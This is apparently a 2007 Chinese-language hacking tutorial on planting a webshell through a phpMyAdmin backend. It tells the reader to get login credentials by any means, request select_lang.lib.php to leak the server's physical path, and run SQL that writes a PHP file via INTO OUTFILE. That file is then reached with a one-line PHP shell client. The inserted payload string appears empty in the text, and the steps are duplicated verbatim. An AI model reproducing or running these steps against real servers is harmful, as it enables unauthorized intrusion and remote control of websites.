phpMyAdmin后台拿webshell
时间:2007-07-30 来源:-ZeE
1.如何拿到登陆密码. 自己想办法
2.访问 :
http://url/phpmyadmin/libraries/select_lang.lib.php
得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
ps:执行语句后在网站跟目录生成一个d.php文件,然后一句话php客户端连接,取得webshell。
2.访问 :
http://url/phpmyadmin/libraries/select_lang.lib.php
得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
ps:执行语句后在网站跟目录生成一个d.php文件,然后一句话php客户端连接,取得webshell。
相关阅读 更多 +
排行榜 更多 +